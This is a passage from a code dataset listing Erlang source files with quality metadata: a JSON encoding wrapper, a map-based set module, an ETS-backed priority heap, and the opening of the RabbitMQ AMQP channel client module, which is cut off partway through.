code stringlengths 114 1.05M | path stringlengths 3 312 | quality_prob float64 0.5 0.99 | learning_prob float64 0.2 1 | filename stringlengths 3 168 | kind stringclasses 1 value |
|---|---|---|---|---|---|
%% -------------------------------------------------------------------
%%
%% Copyright (c) 2019 <NAME>. All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%% @doc JSON Processing
-module(nklib_json).
-author('<NAME> <<EMAIL>>').
-export([encode/1, encode_pretty/1, encode_sorted/1, decode/1, json_ish/1]).
%% ===================================================================
%% Public
%% ===================================================================
%% @doc Encodes a term() to JSON.
%% To use jiffy instead of jsone, include it as a dependency in your
%% application and it will be picked up automatically.
%% NOTE(review): the spec advertises 'error' but failures are raised via
%% error({json_encode_error, _}) — confirm before tightening the spec.
-spec encode(term()) ->
    binary() | error.
encode(Term) ->
    Encoder = fun() ->
                  case erlang:function_exported(jiffy, encode, 1) of
                      true  -> jiffy:encode(Term);
                      false -> jsone:encode(Term)
                  end
              end,
    case nklib_util:do_try(Encoder) of
        {exception, {Class, {Error, Trace}}} when Class =:= error;
                                                  Class =:= throw ->
            lager:debug("Error encoding JSON: ~p (~p) (~p)", [Error, Term, Trace]),
            error({json_encode_error, Error});
        Result ->
            Result
    end.
%% @doc Encodes a term() to JSON with human-readable indentation.
%% Uses jiffy's [pretty] option when jiffy is loaded, otherwise jsone's
%% indent/space options.
-spec encode_pretty(term()) ->
    binary().
encode_pretty(Term) ->
    Encoder = fun() ->
                  case erlang:function_exported(jiffy, encode, 2) of
                      true  -> jiffy:encode(Term, [pretty]);
                      false -> jsone:encode(Term, [{indent, 1}, {space, 2}])
                  end
              end,
    case nklib_util:do_try(Encoder) of
        {exception, {Class, {Error, Trace}}} when Class =:= error;
                                                  Class =:= throw ->
            lager:debug("Error encoding JSON: ~p (~p) (~p)", [Error, Term, Trace]),
            error({json_encode_error, Error});
        Result ->
            Result
    end.
%% @doc Encodes a term() to pretty-printed JSON with object keys in
%% sorted order (see sort_json/1).
-spec encode_sorted(term()) ->
    binary().
encode_sorted(Term) ->
    Sorted = sort_json(Term),
    encode_pretty(Sorted).
%% @private
%% Recursively rewrites maps as jiffy-style {Proplist} tuples with the
%% pairs ordered by key; lists are walked element-wise, and any other
%% term is returned unchanged.
%% NOTE(review): the {Proplist} tuple form is jiffy's ejson encoding —
%% confirm jsone accepts it before relying on the jsone fallback here.
sort_json(Map) when is_map(Map) ->
    Pairs = lists:keysort(1, maps:to_list(Map)),
    {[{Key, sort_json(Value)} || {Key, Value} <- Pairs]};
sort_json(List) when is_list(List) ->
    [sort_json(Element) || Element <- List];
sort_json(Other) ->
    Other.
%% @doc Decodes a JSON binary or iolist. Empty input (<<>> or []) maps to
%% <<>> without invoking a parser. With jiffy present, objects decode to
%% maps (return_maps); otherwise jsone is used.
-spec decode(binary()|iolist()) ->
    term().
decode(<<>>) ->
    <<>>;
decode([]) ->
    <<>>;
decode(Json) ->
    Decoder = fun() ->
                  case erlang:function_exported(jiffy, decode, 2) of
                      true ->
                          jiffy:decode(Json, [return_maps]);
                      false when is_binary(Json) ->
                          jsone:decode(Json);
                      false when is_list(Json) ->
                          jsone:decode(list_to_binary(Json))
                  end
              end,
    case nklib_util:do_try(Decoder) of
        {exception, {Class, {Error, Trace}}} when Class =:= error;
                                                  Class =:= throw ->
            lager:debug("Error decoding JSON: ~p (~p) (~p)", [Error, Json, Trace]),
            error({json_decode_error, Error});
        Result ->
            Result
    end.
%% @doc Makes a map json-ish: keys are coerced to binaries, and values
%% that are not already JSON-compatible scalars (binary, integer, float,
%% boolean or null) are coerced to binaries as well.
json_ish(Map) ->
    Coerce = fun(V) when is_binary(V); is_integer(V);
                         is_float(V); is_boolean(V) ->
                     V;
                (null) ->
                     null;
                (V) ->
                     to_bin(V)
             end,
    maps:fold(
        fun(Key, Value, Acc) ->
            Acc#{to_bin(Key) => Coerce(Value)}
        end,
        #{},
        Map).
%% @private
%% Coerces a term to a binary: binaries pass through unchanged; any
%% other term is delegated to nklib_util:to_binary/1.
to_bin(T) when is_binary(T)-> T;
to_bin(T) -> nklib_util:to_binary(T). | src/nklib_json.erl | 0.555315 | 0.412826 | nklib_json.erl | starcoder |
%% s/sets/map_sets/g
%% Why? Because of speed (This module piggybacks on `maps' module's BIFs)
-module(map_sets).
-export([ new/0
, is_set/1
, size/1
, to_list/1
, from_list/1
]).
-export([ is_element/2
, add_element/2
, del_element/2
]).
-export([ union/2
, union/1
, intersection/2
, intersection/1
]).
-export([ is_disjoint/2
]).
-export([ subtract/2
, is_subset/2
]).
-export([ fold/3
, filter/2
]).
-export_type([set/1, set/0]).
-type set(Key) :: #{Key => term()}.
-type set() :: set(term()).
-define(UNUSED, []).
-ifdef(OTP_RELEASE). %% OTP21+ supports map iterators
-define(iterable(A), maps:iterator(A)).
-define(iterate(I, Last, K, Next, Cons),
case maps:next(I) of
none -> Last;
{K, _, Next} -> Cons
end).
-else.
-define(iterable(A), maps:keys(A)).
-define(iterate(I, Last, K, Next, Cons),
case I of
[] -> Last;
[K|Next] -> Cons
end).
-endif.
%% @doc Returns a new, empty set.
-spec new() -> set().
new() ->
    #{}.
%% @doc True if the argument is representable as a set (i.e. is a map).
-spec is_set(term()) -> boolean().
is_set(A) ->
    is_map(A).
%% @doc Number of elements in the set.
-spec size(set()) -> non_neg_integer().
size(A) ->
    maps:size(A).
%% @doc Folds Function over every element of the set; the map values are
%% bookkeeping placeholders and are ignored.
-spec fold(Function, Acc, Set) -> Acc when
      Function :: fun((Element, Acc) -> Acc),
      Set :: set(Element),
      Acc :: term().
fold(Fun, A, B) ->
    maps:fold( fun(K, _, Acc) -> Fun(K, Acc) end
             , A
             , B).
%% @doc Keeps only the elements for which Predicate returns true.
-spec filter(Predicate, Set) -> Set when
      Predicate :: fun((Element) -> boolean()),
      Set :: set(Element).
filter(P, A) ->
    maps:filter( fun(K, _) -> P(K) end
               , A).
%% @doc Lists the elements of the set (the map keys).
-spec to_list(set(Elem)) -> [Elem].
to_list(A) ->
    maps:keys(A).
%% @doc Builds a set from a list; duplicates collapse into one element.
-spec from_list([Elem]) -> set(Elem).
from_list(L) ->
    maps:from_list([{I, ?UNUSED} || I <- L]).
%% @doc Membership test, O(1) on the underlying map.
-spec is_element(Elem, set(Elem)) -> boolean().
is_element(Elem, Set) ->
    maps:is_key(Elem, Set).
%% @doc Adds an element (no-op if already present).
-spec add_element(Elem, set(Elem)) -> set(Elem).
add_element(Elem, Set) ->
    Set#{Elem => ?UNUSED}.
%% @doc Removes an element (no-op if absent).
-spec del_element(Elem, set(Elem)) -> set(Elem).
del_element(Elem, Set) ->
    maps:remove(Elem, Set).
%% @doc True if every element of S1 is also an element of S2.
%% Iteration over S1 uses the ?iterable/?iterate macros, which expand to
%% maps:iterator/maps:next on OTP 21+ and to a plain key list otherwise.
-spec is_subset(set(Elem), set(Elem)) -> boolean().
is_subset(S1, S2) ->
    is_subset_(?iterable(S1), S2).
%% @private Walks the iterator; short-circuits to false on the first key
%% missing from S2, and returns true when the iterator is exhausted.
is_subset_(Iter, S2) ->
    ?iterate(Iter,
             true,
             K, Next,
             case maps:is_key(K, S2) of
                 true ->
                     is_subset_(Next, S2);
                 false ->
                     false
             end).
%% @doc Set difference: elements of S1 not present in S2.
-spec subtract(set(Elem), set(Elem)) -> set(Elem).
subtract(S1, S2) ->
    maps:without(maps:keys(S2), S1).
%% @doc Union of two sets (a plain map merge; values are placeholders).
-spec union(set(Elem), set(Elem)) -> set(Elem).
union(S1, S2) ->
    maps:merge(S1, S2).
%% @doc Union of a list of sets, folded over an empty accumulator.
-spec union([set(Elem)]) -> set(Elem).
union(L) ->
    lists:foldl(fun maps:merge/2, #{}, L).
%% @doc Intersection of two sets.
%% Always iterates over the smaller operand while probing the larger
%% one, so the cost is proportional to the smaller set's size.
-spec intersection(set(Elem), set(Elem)) -> set(Elem).
intersection(S1, S2) ->
    case maps:size(S2) >= maps:size(S1) of
        true  -> intersection_(S2, S1);
        false -> intersection_(S1, S2)
    end.
%% @private Keeps only the keys of Small that also appear in Large,
%% re-inserting them with the placeholder value.
intersection_(Large, Small) ->
    Keep = fun(Key, _Val, Acc) ->
               case maps:is_key(Key, Large) of
                   true  -> Acc#{Key => ?UNUSED};
                   false -> Acc
               end
           end,
    maps:fold(Keep, #{}, Small).
%% @doc Intersection of a non-empty list of sets, folded pairwise
%% starting from the first set.
-spec intersection(nonempty_list(set(Elem))) -> set(Elem).
intersection([H|T]) ->
    lists:foldl(fun intersection/2, H, T).
%% @doc True if the two sets share no element. Iterates the smaller set
%% (via the ?iterable macro) and probes the larger one.
-spec is_disjoint(set(Elem), set(Elem)) -> boolean().
is_disjoint(S1, S2) ->
    case maps:size(S1) > maps:size(S2) of
        true ->
            is_disjoint_(S1, ?iterable(S2));
        false ->
            is_disjoint_(S2, ?iterable(S1))
    end.
%% @private Short-circuits to false on the first shared key; true when
%% the iterator is exhausted without finding one.
is_disjoint_(Large, Small) ->
    ?iterate(Small,
             true,
             K, Next,
             case maps:is_key(K, Large) of
                 true ->
                     false;
                 false ->
                     is_disjoint_(Large, Next)
             end). | src/map_sets.erl | 0.504639 | 0.507507 | map_sets.erl | starcoder |
%% @doc Min-Heap, Max-Heap for Priority Queues
%%
%% <p>This module implements min-heaps and max-heaps for use in priority queues.
%% Each value in the heap is associated with a reference so that
%% the user can change its priority in O(log n).</p>
%%
%% <p>The implementation is based on ETS tables for the O(1) lookup time.
%% It supports all the basic heap operations:
%% <ul>
%% <li><code>min/1</code>, <code>max/1</code> in <em>O(1)</em></li>
%% <li><code>take_min/1</code>, <code>take_max/1</code> in <em>O(log n)</em></li>
%% <li><code>insert/2</code> in <em>O(log n)</em></li>
%% <li><code>update/3</code> in <em>O(log n)</em></li>
%% <li><code>from_list/2</code> in <em>O(n)</em></li>
%% </ul>
%% </p>
%%
%% <p>In order to achieve the above complexities the heap needs to store
%% an extra tuple <code>{Key, Reference}</code> for every
%% <code>Key</code> stored. In addition, the size of the heap is
%% stored as a tuple <code>{size, Size}</code>.</p>
%%
%% <p>For examples you can check the <code>heap_demo</code> module.</p>
%%
-module(heap).
-export([new/1, heap_size/1, is_empty/1, max/1, min/1, insert/2, delete/1,
take_min/1, take_max/1, update/3, from_list/2, to_list/1]).
-export_type([heap/0]).
%%
%% @type heap(). Min / Max Heap.
%%
-record(heap, {
mode :: mode(),
htab :: ets:tab()
}).
-type heap() :: #heap{}.
-type mode() :: max | min.
-type refterm() :: {term(), reference()}.
%% =======================================================================
%% External Exports
%% =======================================================================
%% @doc Returns a list of the terms stored in a heap (in internal table
%% order, not in priority order).
-spec to_list(heap()) -> [term()].
to_list(H) ->
    %% Keep only the {Position, {Term, Ref}} rows; the comprehension's
    %% pattern silently skips the {Ref, Position} back-pointers and the
    %% {size, N} bookkeeping entry.
    [Term || {_, {Term, _}} <- ets:tab2list(H#heap.htab)].
%% @doc Creates an empty heap.
%% <p>If <code>M</code> is <code>max</code> then it will be a max heap,
%% else if <code>M</code> is <code>min</code> it will be a min heap.</p>
%% The backing ETS table stores positional rows {Pos, {Term, Ref}},
%% back-pointers {Ref, Pos} and one {size, N} bookkeeping row.
-spec new(mode()) -> heap().
new(M) when M =:= max; M=:= min ->
    H = ets:new(?MODULE, [ordered_set, public]),
    ets:insert(H, {size, 0}),
    #heap{mode=M, htab=H};
new(_Mode) ->
    erlang:error(badarg).
%% @doc Deletes a heap (destroys the backing ETS table).
-spec delete(heap()) -> true.
delete(H) -> ets:delete(H#heap.htab).
%% @doc Returns the number of elements contained in a heap, read from
%% the {size, N} bookkeeping row.
-spec heap_size(heap()) -> non_neg_integer().
heap_size(H) ->
    [{size, Len}] = ets:lookup(H#heap.htab, size),
    Len.
%% @doc Checks whether a heap is empty or not.
-spec is_empty(heap()) -> boolean().
is_empty(H) -> heap_size(H) =:= 0.
%% @doc Returns the element of a max heap with the maximum priority.
%% <p>If it is a min heap, it returns <code>{error, min_heap}</code>.</p>
%% The root of the heap always lives at position 1.
-spec max(heap()) -> term() | {error, min_heap | empty_heap}.
max(H) when H#heap.mode =:= max ->
    case ets:lookup(H#heap.htab, 1) of
        [] -> {error, empty_heap};
        [{1, {Max, _Ref}}] -> Max
    end;
max(_H) -> {error, min_heap}.
%% @doc Returns the element of a min heap with the minimum priority.
%% <p>If it is a max heap, it returns <code>{error, max_heap}</code>.</p>
-spec min(heap()) -> term() | {error, max_heap | empty_heap}.
min(H) when H#heap.mode =:= min ->
    case ets:lookup(H#heap.htab, 1) of
        [] -> {error, empty_heap};
        [{1, {Min, _Ref}}] -> Min
    end;
min(_H) -> {error, max_heap}.
%% @doc Add a new element to a heap.
%% <p>Returns the element together with a fresh reference that can later
%% be used with update/3 to change its priority.</p>
%% The element is appended at the last position and then bubbled up.
-spec insert(heap(), term()) -> refterm().
insert(H, X) ->
    Tab = H#heap.htab,
    NewSize = heap_size(H) + 1,
    Ref = erlang:make_ref(),
    ets:insert(Tab, {NewSize, {X, Ref}}),
    ets:insert(Tab, {Ref, NewSize}),
    ets:insert(Tab, {size, NewSize}),
    insert_loop(H, NewSize, NewSize div 2),
    {X, Ref}.
%% @doc Removes and returns the maximum priority element of a max heap.
%% Returns {error, min_heap} when called on a min heap.
-spec take_max(heap()) -> term() | {error, min_heap | empty_heap}.
take_max(H) when H#heap.mode =:= max -> pop(H);
take_max(_H) -> {error, min_heap}.
%% @doc Removes and returns the minimum priority element of a min heap.
%% Returns {error, max_heap} when called on a max heap.
-spec take_min(heap()) -> term() | {error, max_heap | empty_heap}.
take_min(H) when H#heap.mode =:= min -> pop(H);
take_min(_H) -> {error, max_heap}.
%% Deletes and returns the element at the top of the heap (position 1)
%% and re-arranges the rest: the last element is moved to the root and
%% then sifted down with combine/3.
-spec pop(heap()) -> term().
pop(H) ->
    case ets:lookup(H#heap.htab, 1) of
        [] -> {error, empty_heap};
        [{1, {Head, RefHead}}] ->
            HS = heap_size(H),
            [{HS, {X, RefX}}] = ets:lookup(H#heap.htab, HS),
            %% Cleanup of the stale rows; functionally optional since
            %% the size row bounds all traversals.
            ets:delete(H#heap.htab, HS),
            ets:delete(H#heap.htab, RefHead),
            HS_n = HS - 1,
            ets:insert(H#heap.htab, {size, HS_n}),
            %% Only move the last element to the root if the heap is
            %% non-empty after removal.
            case HS_n =:= 0 of
                true -> ok;
                false ->
                    ets:insert(H#heap.htab, {1, {X, RefX}}),
                    ets:insert(H#heap.htab, {RefX, 1})
            end,
            combine(H, 1, HS_n),
            Head
    end.
%% @doc Change the priority of an element.
%% <p>It changes the priority of the element referenced with
%% <code>Ref</code> to <code>Value</code> and then re-arranges the heap.</p>
%% Unknown references are ignored (returns true without changes).
-spec update(heap(), reference(), term()) -> true.
update(H, Ref, X) ->
    case ets:lookup(H#heap.htab, Ref) of
        [] -> true;
        [{Ref, I}] ->
            [{I, {OldX, Ref}}] = ets:lookup(H#heap.htab, I),
            %% A value moving towards the root (bigger in a max heap,
            %% not-bigger in a min heap) bubbles up, otherwise it sinks.
            case {X > OldX, H#heap.mode} of
                {true, max} -> up_heapify(H, I, X, Ref);
                {false, min} -> up_heapify(H, I, X, Ref);
                {false, max} -> down_heapify(H, I, X, Ref);
                {true, min} -> down_heapify(H, I, X, Ref)
            end,
            true
    end.
%% @doc Create a heap from a list of terms in O(n) (bottom-up heapify).
%% <p>It returns the heap and a list of tuples <code>{Key, Ref}</code>
%% where <code>Key</code> is the term that was added and <code>Ref</code>
%% is its reference (used to change its priority).</p>
-spec from_list(mode(), [term()]) -> {heap(), [refterm()]}.
from_list(M, L) when is_list(L), is_atom(M) ->
    HS = erlang:length(L),
    {H, Rs} = ets_from_elements(M, L, HS),
    %% Sift down every internal node, from the last parent to the root.
    I = HS div 2,
    construct_heap(H, I, HS),
    {H, Rs};
from_list(_M, _L) ->
    erlang:error(badarg).
%% =======================================================================
%% Internal Functions
%% =======================================================================
%% Re-arranges the heap in a bottom-up manner: while the element at
%% position I violates the heap property relative to its parent P, swap
%% them and continue from the parent.
-spec insert_loop(heap(), pos_integer(), pos_integer()) -> ok.
insert_loop(H, I, P) when I > 1 ->
    [{I, {Child, _ChildRef}}] = ets:lookup(H#heap.htab, I),
    [{P, {Parent, _ParentRef}}] = ets:lookup(H#heap.htab, P),
    %% In a max heap the parent must not be smaller than the child; in a
    %% min heap it must be strictly smaller (ties also bubble up, as in
    %% the original arrangement).
    ShouldSwap = case H#heap.mode of
                     max -> Parent < Child;
                     min -> Parent >= Child
                 end,
    case ShouldSwap of
        true ->
            swap(H, P, I),
            insert_loop(H, P, P div 2);
        false ->
            ok
    end;
insert_loop(_H, _I, _P) -> ok.
%% Writes the new value at position I and bubbles it up towards the
%% root with insert_loop/3.
-spec up_heapify(heap(), pos_integer(), term(), reference()) -> ok.
up_heapify(H, I, X, Ref) ->
    ets:insert(H#heap.htab, {I, {X, Ref}}),
    P = I div 2,
    insert_loop(H, I, P).
%% Re-arranges the heap in a top-down manner (sift-down): picks the
%% "dominant" node among I and its children and swaps downwards until
%% the heap property holds.
-spec combine(heap(), pos_integer(), pos_integer()) -> ok.
combine(H, I, HS) ->
    L = 2*I,
    R = 2*I + 1,
    MP = I,
    MP_L = combine_h1(H, L, MP, HS),
    MP_R = combine_h1(H, R, MP_L, HS),
    combine_h2(H, MP_R, I, HS).
%% Returns W if the element at W (when within the heap bounds) dominates
%% the current candidate MP, otherwise MP.
-spec combine_h1(heap(), pos_integer(), pos_integer(), pos_integer()) -> pos_integer().
combine_h1(H, W, MP, HS) when W =< HS ->
    [{W, {X, _RefX}}] = ets:lookup(H#heap.htab, W),
    [{MP, {Y, _RefY}}] = ets:lookup(H#heap.htab, MP),
    case {X > Y, H#heap.mode} of
        {true, max} -> W;
        {false, min} -> W;
        {_, _} -> MP
    end;
combine_h1(_H, _W, MP, _HS) -> MP.
%% If a child dominates, swap with it and continue sifting from there;
%% otherwise the heap property holds and we are done.
-spec combine_h2(heap(), pos_integer(), pos_integer(), pos_integer()) -> ok.
combine_h2(_H, MP, I, _HS) when MP =:= I -> ok;
combine_h2(H, MP, I, HS) ->
    swap(H, I, MP),
    combine(H, MP, HS).
%% Writes the new value at position I and sifts it down.
-spec down_heapify(heap(), pos_integer(), term(), reference()) -> ok.
down_heapify(H, I, X, Ref) ->
    ets:insert(H#heap.htab, {I, {X, Ref}}),
    HS = heap_size(H),
    combine(H, I, HS).
%% Exchanges the entries stored at positions I and J, keeping both the
%% positional rows and the {Ref, Pos} back-pointers consistent.
-spec swap(heap(), pos_integer(), pos_integer()) -> true.
swap(H, I, J) ->
    Tab = H#heap.htab,
    [{I, {TermI, RefI}}] = ets:lookup(Tab, I),
    [{J, {TermJ, RefJ}}] = ets:lookup(Tab, J),
    ets:insert(Tab, {I, {TermJ, RefJ}}),
    ets:insert(Tab, {RefJ, I}),
    ets:insert(Tab, {J, {TermI, RefI}}),
    ets:insert(Tab, {RefI, J}).
%% Used for constructing a heap from a list: sifts down every internal
%% node, walking from position I back to the root (Floyd's heapify).
-spec construct_heap(heap(), pos_integer(), pos_integer()) -> ok.
construct_heap(H, I, HS) when I > 0 ->
    combine(H, I, HS),
    construct_heap(H, I-1, HS);
construct_heap(_H, _I, _HS) -> ok.
%% Creates the backing table, records the final size up front, and bulk
%% loads the elements at consecutive positions starting at 1.
-spec ets_from_elements(mode(), [term()], non_neg_integer()) -> {heap(), [refterm()]}.
ets_from_elements(M, L, HS) ->
    H = new(M),
    ets:insert(H#heap.htab, {size, HS}),
    Rs = add_elements(H, L, 1, []),
    {H, Rs}.
%% Inserts each term at the next position N with a fresh reference and
%% the matching back-pointer row; returns the {Term, Ref} pairs in the
%% original list order.
-spec add_elements(heap(), [term()], pos_integer(), [refterm()]) -> [refterm()].
add_elements(_H, [], _N, Acc) ->
    lists:reverse(Acc);
add_elements(H, [T|Ts], N, Acc) ->
    Ref = erlang:make_ref(),
    ets:insert(H#heap.htab, {N, {T, Ref}}),
    ets:insert(H#heap.htab, {Ref, N}),
    add_elements(H, Ts, N+1, [{T, Ref}|Acc]). | src/heap.erl | 0.63861 | 0.509398 | heap.erl | starcoder |
%% This Source Code Form is subject to the terms of the Mozilla Public
%% License, v. 2.0. If a copy of the MPL was not distributed with this
%% file, You can obtain one at https://mozilla.org/MPL/2.0/.
%%
%% Copyright (c) 2007-2020 VMware, Inc. or its affiliates. All rights reserved.
%%
%% @type close_reason(Type) = {shutdown, amqp_reason(Type)}.
%% @type amqp_reason(Type) = {Type, Code, Text}
%% Code = non_neg_integer()
%% Text = binary().
%% @doc This module encapsulates the client's view of an AMQP
%% channel. Each server side channel is represented by an amqp_channel
%% process on the client side. Channel processes are created using the
%% {@link amqp_connection} module. Channel processes are supervised
%% under amqp_client's supervision tree.<br/>
%% <br/>
%% In case of a failure or an AMQP error, the channel process exits with a
%% meaningful exit reason:<br/>
%% <br/>
%% <table>
%% <tr>
%% <td><strong>Cause</strong></td>
%% <td><strong>Exit reason</strong></td>
%% </tr>
%% <tr>
%% <td>Any reason, where Code would have been 200 otherwise</td>
%% <td>```normal'''</td>
%% </tr>
%% <tr>
%% <td>User application calls amqp_channel:close/3</td>
%% <td>```close_reason(app_initiated_close)'''</td>
%% </tr>
%% <tr>
%% <td>Server closes channel (soft error)</td>
%% <td>```close_reason(server_initiated_close)'''</td>
%% </tr>
%% <tr>
%% <td>Server misbehaved (did not follow protocol)</td>
%% <td>```close_reason(server_misbehaved)'''</td>
%% </tr>
%% <tr>
%% <td>Connection is closing (causing all channels to cleanup and
%% close)</td>
%% <td>```{shutdown, {connection_closing, amqp_reason(atom())}}'''</td>
%% </tr>
%% <tr>
%% <td>Other error</td>
%% <td>(various error reasons, causing more detailed logging)</td>
%% </tr>
%% </table>
%% <br/>
%% See type definitions below.
-module(amqp_channel).
-include("amqp_client_internal.hrl").
-behaviour(gen_server).
-export([call/2, call/3, cast/2, cast/3, cast_flow/3]).
-export([close/1, close/3]).
-export([register_return_handler/2, unregister_return_handler/1,
register_flow_handler/2, unregister_flow_handler/1,
register_confirm_handler/2, unregister_confirm_handler/1]).
-export([call_consumer/2, subscribe/3]).
-export([next_publish_seqno/1, wait_for_confirms/1, wait_for_confirms/2,
wait_for_confirms_or_die/1, wait_for_confirms_or_die/2]).
-export([start_link/5, set_writer/2, connection_closing/3, open/1,
enable_delivery_flow_control/1, notify_received/1]).
-export([init/1, terminate/2, code_change/3, handle_call/3, handle_cast/2,
handle_info/2]).
-define(TIMEOUT_FLUSH, 60000).
-record(state, {number,
connection,
consumer,
driver,
rpc_requests = queue:new(),
closing = false, %% false |
%% {just_channel, Reason} |
%% {connection, Reason}
writer,
return_handler = none,
confirm_handler = none,
next_pub_seqno = 0,
flow_active = true,
flow_handler = none,
unconfirmed_set = gb_sets:new(),
waiting_set = gb_trees:empty(),
only_acks_received = true,
%% true | false, only relevant in the direct
%% client case.
%% when true, consumers will manually notify
%% queue pids using rabbit_amqqueue_common:notify_sent/2
%% to prevent the queue from overwhelming slow
%% consumers that use automatic acknowledgement
%% mode.
delivery_flow_control = false
}).
%%---------------------------------------------------------------------------
%% Type Definitions
%%---------------------------------------------------------------------------
%% @type amqp_method().
%% This abstract datatype represents the set of methods that comprise
%% the AMQP execution model. As indicated in the overview, the
%% attributes of each method in the execution model are described in
%% the protocol documentation. The Erlang record definitions are
%% autogenerated from a parseable version of the specification. Most
%% fields in the generated records have sensible default values that
%% you need not worry about in the case of a simple usage of the client
%% library.
%% @type amqp_msg() = #amqp_msg{}.
%% This is the content encapsulated in content-bearing AMQP methods. It
%% contains the following fields:
%% <ul>
%% <li>props :: class_property() - A class property record, defaults to
%% #'P_basic'{}</li>
%% <li>payload :: binary() - The arbitrary data payload</li>
%% </ul>
%%---------------------------------------------------------------------------
%% AMQP Channel API methods
%%---------------------------------------------------------------------------
%% @spec (Channel, Method) -> Result
%% @doc This is equivalent to amqp_channel:call(Channel, Method, none).
call(Channel, Method) ->
    call(Channel, Method, none).
%% @spec (Channel, Method, Content) -> Result
%% where
%% Channel = pid()
%% Method = amqp_method()
%% Content = amqp_msg() | none
%% Result = amqp_method() | ok | blocked | closing
%% @doc This sends an AMQP method on the channel.
%% For content bearing methods, Content has to be an amqp_msg(), whereas
%% for non-content bearing methods, it needs to be the atom 'none'.<br/>
%% In the case of synchronous methods, this function blocks until the
%% corresponding reply comes back from the server and returns it.
%% In the case of asynchronous methods, the function blocks until the method
%% gets sent on the wire and returns the atom 'ok' on success.<br/>
%% This will return the atom 'blocked' if the server has
%% throttled the client for flow control reasons. This will return the
%% atom 'closing' if the channel is in the process of shutting down.<br/>
%% Note that for asynchronous methods, the synchronicity implied by
%% 'call' only means that the client has transmitted the method to
%% the broker. It does not necessarily imply that the broker has
%% accepted responsibility for the message.
%% self() is evaluated in the caller, so the channel sees the calling
%% process as the sender.
call(Channel, Method, Content) ->
    gen_server:call(Channel, {call, Method, Content, self()}, amqp_util:call_timeout()).
%% @spec (Channel, Method) -> ok
%% @doc This is equivalent to amqp_channel:cast(Channel, Method, none).
cast(Channel, Method) ->
    cast(Channel, Method, none).
%% @spec (Channel, Method, Content) -> ok
%% where
%% Channel = pid()
%% Method = amqp_method()
%% Content = amqp_msg() | none
%% @doc This function is the same as {@link call/3}, except that it returns
%% immediately with the atom 'ok', without blocking the caller process.
%% This function is not recommended with synchronous methods, since there is no
%% way to verify that the server has received the method.
cast(Channel, Method, Content) ->
    gen_server:cast(Channel, {cast, Method, Content, self(), noflow}).
%% @spec (Channel, Method, Content) -> ok
%% where
%% Channel = pid()
%% Method = amqp_method()
%% Content = amqp_msg() | none
%% @doc Like cast/3, with flow control: a credit_flow credit is consumed
%% in the caller before the method is cast, and acknowledged by the
%% channel when it processes the message.
cast_flow(Channel, Method, Content) ->
    credit_flow:send(Channel),
    gen_server:cast(Channel, {cast, Method, Content, self(), flow}).
%% @spec (Channel) -> ok | closing
%% where
%% Channel = pid()
%% @doc Closes the channel, invokes
%% close(Channel, 200, <<"Goodbye">>).
close(Channel) ->
    close(Channel, 200, <<"Goodbye">>).
%% @spec (Channel, Code, Text) -> ok | closing
%% where
%% Channel = pid()
%% Code = integer()
%% Text = binary()
%% @doc Closes the channel, allowing the caller to supply a reply code and
%% text. If the channel is already closing, the atom 'closing' is returned.
close(Channel, Code, Text) ->
    gen_server:call(Channel, {close, Code, Text}, amqp_util:call_timeout()).
%% @spec (Channel) -> integer()
%% where
%% Channel = pid()
%% @doc When in confirm mode, returns the sequence number of the next
%% message to be published.
next_publish_seqno(Channel) ->
    gen_server:call(Channel, next_publish_seqno, amqp_util:call_timeout()).
%% @spec (Channel) -> boolean() | 'timeout'
%% where
%% Channel = pid()
%% @doc Wait until all messages published since the last call have
%% been either ack'd or nack'd by the broker. Note, when called on a
%% non-Confirm channel, waitForConfirms throws an exception (it
%% delegates to wait_for_confirms/2, which throws the error reason).
wait_for_confirms(Channel) ->
    wait_for_confirms(Channel, amqp_util:call_timeout()).
%% @spec (Channel, Timeout) -> boolean() | 'timeout'
%% where
%% Channel = pid()
%% Timeout = non_neg_integer() | 'infinity'
%% @doc Wait until all messages published since the last call have
%% been either ack'd or nack'd by the broker or the timeout expires.
%% Note, when called on a non-Confirm channel, waitForConfirms throws
%% an exception.
wait_for_confirms(Channel, Timeout) ->
    case gen_server:call(Channel, {wait_for_confirms, Timeout}, amqp_util:call_timeout()) of
        {error, Reason} -> throw(Reason);
        Other -> Other
    end.
%% @spec (Channel) -> true
%% where
%% Channel = pid()
%% @doc Behaves the same as wait_for_confirms/1, but if a nack is
%% received, the calling process exits with reason
%% exit(nacks_received).
wait_for_confirms_or_die(Channel) ->
    wait_for_confirms_or_die(Channel, amqp_util:call_timeout()).
%% @spec (Channel, Timeout) -> true
%% where
%% Channel = pid()
%% Timeout = non_neg_integer() | 'infinity'
%% @doc Behaves the same as wait_for_confirms/1, but if a nack is
%% received, the calling process exits with reason
%% exit(nacks_received). If the timeout expires, the calling process
%% exits with reason exit(timeout). In both cases the channel is closed
%% first.
wait_for_confirms_or_die(Channel, Timeout) ->
    case wait_for_confirms(Channel, Timeout) of
        timeout -> close(Channel, 200, <<"Confirm Timeout">>),
                   exit(timeout);
        false   -> close(Channel, 200, <<"Nacks Received">>),
                   exit(nacks_received);
        true    -> true
    end.
%% @spec (Channel, ReturnHandler) -> ok
%% where
%% Channel = pid()
%% ReturnHandler = pid()
%% @doc This registers a handler to deal with returned messages. The
%% registered process will receive #basic.return{} records.
%% The channel monitors the handler process.
register_return_handler(Channel, ReturnHandler) ->
    gen_server:cast(Channel, {register_return_handler, ReturnHandler} ).
%% @spec (Channel) -> ok
%% where
%% Channel = pid()
%% @doc Removes the return handler, if it exists. Does nothing if there is no
%% such handler.
%% NOTE(review): the matching handle_cast clause pattern-matches a
%% registered {Handler, Ref} tuple; unregistering when no handler is
%% registered appears to crash the channel process — confirm before
%% relying on "does nothing".
unregister_return_handler(Channel) ->
    gen_server:cast(Channel, unregister_return_handler).
%% @spec (Channel, ConfirmHandler) -> ok
%% where
%% Channel = pid()
%% ConfirmHandler = pid()
%% @doc This registers a handler to deal with confirm-related
%% messages. The registered process will receive #basic.ack{} and
%% #basic.nack{} commands.
register_confirm_handler(Channel, ConfirmHandler) ->
    gen_server:cast(Channel, {register_confirm_handler, ConfirmHandler} ).
%% @spec (Channel) -> ok
%% where
%% Channel = pid()
